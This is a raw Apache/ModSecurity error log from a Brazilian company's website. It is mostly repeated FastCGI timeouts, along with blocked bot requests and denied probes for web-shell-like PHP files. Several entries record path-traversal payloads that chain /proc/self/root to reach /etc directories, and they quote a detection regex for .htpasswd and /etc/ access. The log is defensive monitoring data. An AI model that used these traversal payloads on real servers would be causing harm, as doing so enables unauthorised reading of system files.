[Tue Mar 17 13:31:29.110017 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41712] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:31:50.121796 2026] [proxy_fcgi:error] [pid 18380:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41974] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:32:11.125817 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:32:33.125827 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42498] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:32:55.121164 2026] [proxy_fcgi:error] [pid 18380:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:33:18.489802 2026] [proxy_fcgi:error] [pid 11293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:33:40.117820 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43472] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:34:01.049828 2026] [proxy_fcgi:error] [pid 18380:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:34:24.121875 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:34:45.135366 2026] [proxy_fcgi:error] [pid 9299:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:35:06.129860 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44854] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:35:28.121843 2026] [proxy_fcgi:error] [pid 9299:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:35:49.134415 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45940] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:36:10.127879 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46410] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:36:31.137823 2026] [proxy_fcgi:error] [pid 7004:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:36:53.131839 2026] [proxy_fcgi:error] [pid 18380:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:37:14.120647 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:37:31.219282 2026] [access_compat:error] [pid 17965:tid 140411632822016] [client 20.220.232.240:46652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/z.php
[Tue Mar 17 13:37:31.347584 2026] [access_compat:error] [pid 17965:tid 140411574073088] [client 20.220.232.240:46652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/lala.php
[Tue Mar 17 13:37:31.484733 2026] [access_compat:error] [pid 17965:tid 140411565680384] [client 20.220.232.240:46652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/byp.php
[Tue Mar 17 13:37:31.632976 2026] [access_compat:error] [pid 17965:tid 140411716749056] [client 20.220.232.240:46652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file.php
[Tue Mar 17 13:37:31.762157 2026] [access_compat:error] [pid 17965:tid 140411641214720] [client 20.220.232.240:46652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/8.php
[Tue Mar 17 13:37:36.129794 2026] [proxy_fcgi:error] [pid 6296:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:37:58.125848 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:38:20.125770 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:38:41.133450 2026] [proxy_fcgi:error] [pid 7437:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:39:02.139631 2026] [proxy_fcgi:error] [pid 18380:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:39:24.145840 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49466] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:39:45.125808 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:40:06.125791 2026] [proxy_fcgi:error] [pid 7004:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:40:27.117870 2026] [proxy_fcgi:error] [pid 7437:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:40:48.091474 2026] [proxy_fcgi:error] [pid 9299:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:41:09.130259 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:41:30.129842 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:41:51.120297 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51022] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:42:12.125862 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51284] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:42:33.129841 2026] [proxy_fcgi:error] [pid 6296:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:42:55.033830 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:43:16.129786 2026] [proxy_fcgi:error] [pid 7004:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52224] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:43:37.119897 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52668] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:43:58.125841 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:44:19.108108 2026] [proxy_fcgi:error] [pid 7437:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53442] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:44:40.121546 2026] [proxy_fcgi:error] [pid 9299:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:45:01.042196 2026] [proxy_fcgi:error] [pid 7437:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53918] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:45:23.129787 2026] [proxy_fcgi:error] [pid 7437:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:45:44.141801 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54352] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:46:05.133832 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:46:26.133828 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:46:47.089917 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55002] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:47:08.129125 2026] [proxy_fcgi:error] [pid 17965:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55230] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:47:29.082279 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:47:50.201791 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:48:12.072286 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:48:33.129833 2026] [proxy_fcgi:error] [pid 17965:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:48:54.121847 2026] [proxy_fcgi:error] [pid 2598:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:49:15.122038 2026] [proxy_fcgi:error] [pid 7437:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57086] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:49:36.129799 2026] [proxy_fcgi:error] [pid 18380:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57534] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:49:57.134051 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57882] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:50:18.093857 2026] [proxy_fcgi:error] [pid 17965:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:50:40.127567 2026] [proxy_fcgi:error] [pid 9299:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:51:01.035002 2026] [proxy_fcgi:error] [pid 18380:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:51:22.133786 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59062] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:51:43.121859 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59340] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:52:04.135244 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59584] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:52:25.109824 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59974] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:52:46.125785 2026] [proxy_fcgi:error] [pid 9299:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60400] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:52:59.312654 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.244.43:57604] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmG69CmCSWTlPouqorirAAAAMc"]
[Tue Mar 17 13:53:07.125808 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:53:08.503433 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.228.61:39458] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmG9AeiSKl8TjouI-YX_wAAA8A"]
[Tue Mar 17 13:53:29.133786 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:32830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:53:50.118358 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33252] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:54:11.049907 2026] [proxy_fcgi:error] [pid 7437:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:54:32.126053 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34030] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:54:36.917381 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.128:59396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmHTKBJNF7axNlVR0UVUQAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 13:54:53.049833 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34690] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:55:15.034007 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35228] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:55:36.122151 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:55:57.133203 2026] [proxy_fcgi:error] [pid 6296:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:56:13.175246 2026] [access_compat:error] [pid 9299:tid 140411716749056] [client 216.73.216.191:39038] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 13:56:18.069676 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:56:39.134372 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:57:00.121804 2026] [proxy_fcgi:error] [pid 17965:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37508] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:57:23.451958 2026] [proxy_fcgi:error] [pid 17965:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:57:45.125787 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38258] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:57:52.206505 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.244.43:52952] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmIEBj0p0SRWAqcjGF4yQAAAw0"]
[Tue Mar 17 13:57:57.348476 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.228.61:42868] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmIFXIk7brgkOH-rIWK4wAAAUw"]
[Tue Mar 17 13:58:06.119561 2026] [proxy_fcgi:error] [pid 7437:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38678] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:58:28.133776 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39168] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:58:50.129778 2026] [proxy_fcgi:error] [pid 7004:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39776] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:59:12.121982 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:59:37.145823 2026] [proxy_fcgi:error] [pid 2598:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:00:00.137816 2026] [proxy_fcgi:error] [pid 17965:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41734] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:00:07.987782 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.128:45798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIlweiSKl8TjouI-YY4gAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:13.339818 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.243.128:57698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmImcU6Sx0TG1YjmQitowAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:22.092575 2026] [proxy_fcgi:error] [pid 9299:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42332] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:00:30.312110 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.243.128:56048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIrr-sgTmmJoPuMdy11AAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:31.642230 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.243.128:56048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIr7-sgTmmJoPuMdy11QAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:36.263431 2026] [:error] [pid 28243:tid 140411708356352] [client 74.7.243.128:58182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmItA9EzQ9w6IvBX0sTPQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:44.130909 2026] [proxy_fcgi:error] [pid 7437:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42964] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:00:46.122235 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:42218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIvtY0UrI5A3LftIz7EAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:47.669616 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:42230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIv9Y0UrI5A3LftIz7EgAAAYc"], referer: 